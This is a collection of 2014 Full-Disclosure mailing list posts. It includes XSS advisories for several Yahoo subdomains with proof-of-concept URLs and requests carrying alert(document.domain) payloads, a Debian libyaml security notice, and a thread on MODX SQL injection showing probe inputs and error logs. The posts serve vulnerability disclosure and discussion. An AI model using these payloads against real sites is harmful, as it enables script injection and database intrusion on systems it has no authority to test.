[Full-disclosure] Yahoo Bug Bounty Program Vulnerability #1 XSS on ads.yahoo.com
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
In Nov ?13 I reported a Cross-site Scripting vulnerability to the Yahoo
Bug Bounty Program. As for my other reports, I?ve got no response or
feedback,
so I wrote a message to them via email this time ... and so on ... blah
blah :)
To cut a long story short, for all my reports the communication with
Yahoo was really bad and of course: No bounty!
Advisory: Yahoo Bug Bounty Program Vulnerability #1
XSS on ads.yahoo.com
Advisory ID:SSCHADV2013-YahooBB-001
Author:Stefan Schurtz
Affected Software: Successfully tested on ads.yahoo.com
Vendor URL:http://yahoo.com/
Vendor Status: Seems to be fixed
Bounty: nothing
==
Vulnerability Description
==
The '_cbv'-Paramter on http://ads.yahoo.com; is prone to a Cross-site
Scripting vulnerability
==
PoC-Exploit
==
http://ads.yahoo.com/st?ad_type=iframead_size=300x250site=1181425section_code=112260532;
cb=1385497647.226089publisher_blob=${RS}|gmGLFTE4OC4mbYnzUpH6dwEQOTMuMlKVBC__yxq4
|2143911627|LREC2|1385497647.226089yud=smpv%3d3%26ed%3dzxE1dF31xQzMnXQidpJpWNtP
OVygJhcHBknzVCnpTraLTXtt8jO7OEVYpCbxEhJcwmU2x.ekTqffsDUVYgceDTs.NijijL.tGPKwsdRUsLvxftzYGe
.0VUghSSHioqjLjQJ7KaidIocpC1oj2SKC4lg_EhLiMsmgXiq6wbNVL_VzG1fHxP77ptF04VC7jL7lL1vr0iRs.r6
8cRSLiFUFzH_pvnaxUy8-_msd=1_xcf=1_exv=RDnhGI4wnN7uv.jS65VPBVAFmZBbevIBHZGnRIl5vxDV_msig=10sorm5kdrmxbkn=0_cbv=13202581681c91-alert(document.domain)-1580bfdcb31=1
==
Disclosure Timeline
==
28-Nov-2013 - vendor informed by contact form (Yahoo Bug Bounty Program)
31-Dec-2013 - next message to the Yahoo Securiy Contact
04-Jan-2014 - feedback from vendor
04-Jan-2014 - vendor informed again about the three vulnerabilities
06-Jan-2014 - feedback from vendor
15-Jan-2014 - contact with Jeff Zingler (Threat Response @ Yahoo)
16-Jan-2013 - contact with Jeff Zingler (Threat Response @ Yahoo) //
last contact
==
Credits
==
Vulnerability found and advisory written by Stefan Schurtz.
==
References
==
http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2013-YahooBB-001.txt
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)
iEYEARECAAYFAlMa754ACgkQg3svV2LcbMCOdwCeIA7oMkSnPBbwwWTDlQRV4igR
YcsAnim2G2fNSu42X8E2PXfSM2TNFqd9
=G3sf
-END PGP SIGNATURE-
0x62DC6CC0.asc
Description: application/pgp-keys
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Yahoo Bug Bounty Program Vulnerability #3 XSS on de-mg42.mail.yahoo.com
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Here is the my last advisory which I've reported in 2013 to the Yahoo Bug Bounty Program. And again...the same story for this report as for my others :-/ If you're interested, you can read it here: http://darksecurity.de/index.php?/259-Yahoo-Bug-Bounty-Program-Vulnerability-1-XSS-on-ads.yahoo.com.html http://darksecurity.de/index.php?/254-Yahoo-Bug-Bounty-Program-Vulnerability-2-Open-Redirect.html Advisory:Yahoo Bug Bounty Program Vulnerability #3 XSS on de-mg42.mail.yahoo.com Advisory ID: SSCHADV2013-YahooBB-002 Author: Stefan Schurtz Affected Software:Successfully tested on de-mg42.mail.yahoo.com Vendor URL: http://yahoo.com/ Vendor Status: Not tested anymore Bounty: nothing == Vulnerability Description == The 'intl'-Paramter on https://de-mg42.mail.yahoo.com/; is prone to a Cross-site Scripting vulnerability == PoC-Exploit == GET https://de-mg42.mail.yahoo.com/neo/launch?.rand=02j5el0e9m3mr Host: de-mg42.mail.yahoo.com User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:25.0) Gecko/20100101 Firefox/25.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: YM.SREQs.schurtz=1; YM.NEO_114841791630661482=width=1920height=874; B=aj6vf6l8j20rvb=4 d=itbFpMNpYFMz7rPwe5JFum_ghxk-s=i8i=lvGlArFYMBIJ47eKw1fV; RMBX=aj6vf6l8j20rvb=3s=0kt=59; V=v=0.90cc=0m=0; POPUPCHECK=1387130698530; adx=c322590@1386248182@1; T=z=bslqSBbANvSBRhTgC/z0ojCNjA2MAY2NjNPMzYwTjYxNDcxMTa=QAE sk=DAA8V8EU20nhMOks=EAAl0SH4Wfzh6QOSww.4WR97g--~Ed=c2wBTVRjeE53RXhNVFE0TkRFM09URTJNekEyTmpFME9ESS0BYQFRQUUBZwFYR1lLREF LVTdFWjU0SjY3QVJaUEYyMzZZSQFzY2lkAWJIVnpjWTF0a DdTVFREVFJLZUtxem4yeC5DWS0BYWMBQUVERkQ5VWQBdGlwAWQ1OTc3RAFzYwF3bAF6egFic2xxU0JBN0U-; F=a=5wuRvLEMvSo9VbE7dA3FBiS57T.ECJPqZKL7SqUSshaxgafrUTyTA2TfmjWAGc1FiTDSLSw- b=_pW9; PH=l=de-DEi=defn=K2_4Upj6Mg1KYq4D9FKN; SSL=v=1s=ZKphB8TnY2DMWrNEU3WnQdsBp50y6G.DA.GMkzNJBkkaUPmmwLBscSpK5X5gJjBMR671vlpoBasj8HY6cXSNbA-- kv=0; ywadp100034076556=3167627385; fpc100034076556=ZavCj2Fd|aEGcHAwNaa|fses100034076556=|aEGcHAwNaa| ZavCj2Fd|fvis100034076556=|8Mo080oosT|8Mo080oosT|8Mo080oosT|8|8Mo080oosT|8Mo080oosT; ywadp1000357943879=4084605029; fpc1000357943879=ZbHoAVDq|0UsAOAwNaa|fses1000357943879=|0UsAOAwNaa|ZbHoAVDq|fvis1000357943879= |8Mo0807780|8Mo0807780|8Mo0807780|8|8Mo0807780|8Mo0807780; AO=o=0; YLS=v=1p=1n=0; ucs=bnas=0eup=1; _br_uid_2=uid%3D9863339468277%3Av%3D10.6.1%3Ats%3D1386895411464%3Ahc%3D1; Y=v=1n=d7kp7cfrj6gcml=i.i27khjp/o p=m2evvde01200iz=r=sdlg=de-DEintl=dec52a6-alert(document.domain)-c8d9133635e; U=mt=fnqDoZ2MhYjxjMnSZ.dZc46HZp7QbCgwGOhf97k- ux=u2JrSBun=d7kp7cfrj6gcm; ypcdb=cf2c3147a30c5264ccbae29c07ec31b3; YM=v=2u=bTYqAOaoqXPwtE2NaDnywgQ.MkXnpDL1MkqqIA--d=f=AAAt=3bKrSBs=55nr; DK=v=2p=NnwyMzMwfFZpcnR1YWx8RGVza3RvcCBCcm93c2VyfHdpbmRvd3MgbnR8NS4x Connection: keep-alive == Disclosure Timeline == 15-Dec-2013 - vendor informed by contact form (Yahoo Bug Bounty Program) 31-Dec-2013 - next message to the Yahoo Securiy Contact 04-Jan-2014 - feedback from vendor 04-Jan-2014 - vendor informed again about the three vulnerabilities 06-Jan-2014 - feedback from vendor 15-Jan-2014 - contact with Jeff Zingler (Threat Response@Yahoo) 16-Jan-2013 - contact with Jeff Zingler (Threat Response@Yahoo) // last contact == Credits == Vulnerability found and advisory written by Stefan Schurtz. == References == http://yahoo.com/ http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2013-YahooBB-003.txt -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlMa78MACgkQg3svV2LcbMA5hgCgi0sk2j/n8YAMLvQ4Nk3DMy9M YrwAnAh2YEiFU76e8UU+RVsI9K0zkz35 =DnNI -END PGP SIGNATURE- 0x62DC6CC0.asc Description: application/pgp-keys ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Yahoo Bug Bounty Program Vulnerability #4 #5 #6 Cross-site Scripting vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 In Jan ?14 I reported three Cross-site Scripting vulnerabilities to the Yahoo Bug Bounty Program. And I know, it is really really hard, but ... again ... no feedback or bounty :) Advisory:Yahoo Bug Bounty Program Vulnerability #4 #5 #6 Cross-site Scripting vulnerabilities Advisory ID: SSCHADV2014-YahooBB-004 / YahooBB-005 / YahooBB-006 Author: Stefan Schurtz Affected Software:Successfully tested on celebrity.yahoo.com, movies.yahoo.com, music.yahoo.com Vendor URL: http://yahoo.com/ Vendor Status: Not tested anymore Bounty: nothing == Vulnerability Description == The 'mode'-Paramter on https://celebrity.yahoo.com/;, https://movies.yahoo.com/;, https://music.yahoo.com/; is prone to a Cross-site Scripting vulnerability == PoC-Exploit == http://celebrity.yahoo.com/video/george-clooney-responds-tina-fey-230813957.html?m_id=m_mode=instance_id=mode=multipart-alert(document.domain)-__phase=pretype=index http://movies.yahoo.com/photos/star-wars-cast-rumors-1389647299-slideshow/?m_id=m_mode=instance_id=mode=multipart-alert(document.domain)-__phase=pretype=index http://music.yahoo.com/videos/?m_id=m_mode=instance_id= mode=multipart-alert(document.domain)-__phase=pretype=index == Disclosure Timeline == 20-Jan-2014 - vendor informed by contact form (Yahoo Bug Bounty Program) == Credits == Vulnerabilities found and advisory written by Stefan Schurtz. == References == http://yahoo.com/ http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-004.txt http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-005.txt http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-006.txt -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlMa8HkACgkQg3svV2LcbMBo9gCeIc8L/kBFOjdNV8J3pmY65UwV oFwAn3WBJHwesMpMzG4Z1qxTA10c9sZ0 =+fff -END PGP SIGNATURE- 0x62DC6CC0.asc Description: application/pgp-keys ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Yahoo Bug Bounty Program Vulnerability #3 XSS on de-mg42.mail.yahoo.com
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi Jann, you're right...bad description here (too much copy paste) :) The XSS is cookie-based, so you can find it in the cookie with the payload. Please see intl=dec52a6-alert(document.domain)-c8d9133635e; Kind regards, Stefan Am 08.03.2014 11:40, schrieb Jann Horn: On Sat, Mar 08, 2014 at 11:24:03AM +0100, Stefan Schurtz wrote: The 'intl'-Paramter on https://de-mg42.mail.yahoo.com/; is prone to a Cross-site Scripting vulnerability [...] GET https://de-mg42.mail.yahoo.com/neo/launch?.rand=02j5el0e9m3mr Host: de-mg42.mail.yahoo.com [...] Uh, where is that intl parameter you speak of? the only parameter I see here is .rand, which, as far as I know, just serves to circumvent caching. And where is the XSS payload? -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlMa+J0ACgkQg3svV2LcbMCRLwCfR1L1XiqxEjnT4F8Z/MYJFbLS KSoAnRQAMaK6woO866COwlK1kPsYaueu =wg9L -END PGP SIGNATURE- 0x62DC6CC0.asc Description: application/pgp-keys ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2870-1] libyaml-libyaml-perl security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2870-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso March 08, 2014 http://www.debian.org/security/faq - - Package: libyaml-libyaml-perl Vulnerability : heap-based buffer overflow CVE ID : CVE-2013-6393 Florian Weimer of the Red Hat Product Security Team discovered a heap-based buffer overflow flaw in LibYAML, a fast YAML 1.1 parser and emitter library. A remote attacker could provide a YAML document with a specially-crafted tag that, when parsed by an application using libyaml, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. This update corrects this flaw in the copy that is embedded in the libyaml-libyaml-perl package. For the oldstable distribution (squeeze), this problem has been fixed in version 0.33-1+squeeze2. For the stable distribution (wheezy), this problem has been fixed in version 0.38-3+deb7u1. For the testing distribution (jessie), this problem has been fixed in version 0.41-4. For the unstable distribution (sid), this problem has been fixed in version 0.41-4. We recommend that you upgrade your libyaml-libyaml-perl packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCgAGBQJTGxHlAAoJEAVMuPMTQ89EbtQQAKD9QG9kNJTuFl0P777wSyAR gQzzFjOGPP+p9Q3OWewXK2Xfk6fb6eBRk2vI3TZ63XD3KPPebhfMvRGHILp1jscI hab6pHbp2Bs6PcX+ahEUfVhnv+7J+RxNEjjl5RWMIznUCM6G5tX4xjAbaKTnAUSZ cbGHc3agtNXxQLGdW1eLedIZjWqVtkPQ3q7UbGl8dXbP8s1XWc0N+LJZDskFYfUT /99qX122gFOpNPI9YGuosa+I5J0LWCJz/+qN00wx5K5uipsV52wgR4Kq+xMLV545 A1sPTpNiNkOrIvXQiWLP6JrLV39gb0G09dBCn6veCmhiagBvkSY5A8/wWphiG9k1 OKpwqYp1rFxWEpCgImU3TqiZutIM/yKopJPa+Lz4ZAb6yI62411hati7f6gqdYk1 GU3cJsPMQQ4Xz7Uj0po2gZ76UNo5skYsdOdunQv3foWDVoRNkHB1BbTsrQFBUD3u zbih3vhLmK01lvgNYDTyhJodtCfRJumMn6o0zaWBEYOVpD7GzwABxECyDwSe626D bs8QXWPuK5DaJ/XkntmswRkeJ3NBsGVwaZUszmTPCLLX/XEPDQls1yuYnPCUvo/4 +hNTlkEwpzW1x1G1Kpd7m2j7KsS6xpAgnt90B0RHPrTtS63xEGIgk3Z5301yxzcE OjzJ2ZxxdRIEU6fMgC0W =fvig -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MODX SQLi from oss-sec
The author of the email to the oss-sec says he isn't sure if the linked commit fixes the issue and it should. You can exploit this possibly using a blind time or boolean sqli. This is me just playing around after doing some code analysis. Possibly other connectors are affected? No idea about whether authentication will be needed for all vectors, but in my cursory testing it needed at least a PHPSESSID cookie (maybe just get first index to get anon PHPSESSID, who knows). [2014-03-08 11:03:33] (ERROR @ /modx/connectors/lang.js.php) Error 42000 executing statement: Array ( [0] = 42000 [1] = 1064 [2] = You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1=1' at line 1 ) [2014-03-08 11:03:33] (ERROR @ /modx/connectors/lang.js.php) Could not prepare context: mgr 1=1 [2014-03-08 11:03:44] (ERROR @ /modx/connectors/lang.js.php) Error 42S22 executing statement: Array ( [0] = 42S22 [1] = 1054 [2] = Unknown column 'mgr' in 'where clause' ) [2014-03-08 11:03:44] (ERROR @ /modx/connectors/lang.js.php) Could not prepare context: mgr and 1=1 [2014-03-08 11:03:54] (ERROR @ /modx/connectors/lang.js.php) Error 42S22 executing statement: Array ( [0] = 42S22 [1] = 1054 [2] = Unknown column 'mgr' in 'where clause' ) -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MODX SQLi from oss-sec
Sorry, oss-sec link: http://seclists.org/oss-sec/2014/q1/532 On Sat, Mar 8, 2014 at 11:24 AM, Brandon Perry bperry.volat...@gmail.comwrote: The author of the email to the oss-sec says he isn't sure if the linked commit fixes the issue and it should. You can exploit this possibly using a blind time or boolean sqli. This is me just playing around after doing some code analysis. Possibly other connectors are affected? No idea about whether authentication will be needed for all vectors, but in my cursory testing it needed at least a PHPSESSID cookie (maybe just get first index to get anon PHPSESSID, who knows). [2014-03-08 11:03:33] (ERROR @ /modx/connectors/lang.js.php) Error 42000 executing statement: Array ( [0] = 42000 [1] = 1064 [2] = You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1=1' at line 1 ) [2014-03-08 11:03:33] (ERROR @ /modx/connectors/lang.js.php) Could not prepare context: mgr 1=1 [2014-03-08 11:03:44] (ERROR @ /modx/connectors/lang.js.php) Error 42S22 executing statement: Array ( [0] = 42S22 [1] = 1054 [2] = Unknown column 'mgr' in 'where clause' ) [2014-03-08 11:03:44] (ERROR @ /modx/connectors/lang.js.php) Could not prepare context: mgr and 1=1 [2014-03-08 11:03:54] (ERROR @ /modx/connectors/lang.js.php) Error 42S22 executing statement: Array ( [0] = 42S22 [1] = 1054 [2] = Unknown column 'mgr' in 'where clause' ) -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MODX SQLi from oss-sec
FWIW I believe it is this line that is vulnerable in particular. I can't
prove this at the moment though:
core/model/modx/processors/resource/getnodes.class.php:134:
(SELECT COUNT(*) FROM {$this-modx-getTableName('modResource')} WHERE
context_key = modContext.{$this-modx-escape('key')} AND id IN
({$this-defaultRootId})) 0,
On Sat, Mar 8, 2014 at 11:24 AM, Brandon Perry bperry.volat...@gmail.comwrote:
Sorry, oss-sec link:
http://seclists.org/oss-sec/2014/q1/532
On Sat, Mar 8, 2014 at 11:24 AM, Brandon Perry
bperry.volat...@gmail.comwrote:
The author of the email to the oss-sec says he isn't sure if the linked
commit fixes the issue and it should.
You can exploit this possibly using a blind time or boolean sqli. This is
me just playing around after doing some code analysis. Possibly other
connectors are affected? No idea about whether authentication will be
needed for all vectors, but in my cursory testing it needed at least a
PHPSESSID cookie (maybe just get first index to get anon PHPSESSID, who
knows).
[2014-03-08 11:03:33] (ERROR @ /modx/connectors/lang.js.php) Error 42000
executing statement:
Array
(
[0] = 42000
[1] = 1064
[2] = You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near
'1=1' at line 1
)
[2014-03-08 11:03:33] (ERROR @ /modx/connectors/lang.js.php) Could not
prepare context: mgr 1=1
[2014-03-08 11:03:44] (ERROR @ /modx/connectors/lang.js.php) Error 42S22
executing statement:
Array
(
[0] = 42S22
[1] = 1054
[2] = Unknown column 'mgr' in 'where clause'
)
[2014-03-08 11:03:44] (ERROR @ /modx/connectors/lang.js.php) Could not
prepare context: mgr and 1=1
[2014-03-08 11:03:54] (ERROR @ /modx/connectors/lang.js.php) Error 42S22
executing statement:
Array
(
[0] = 42S22
[1] = 1054
[2] = Unknown column 'mgr' in 'where clause'
)
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
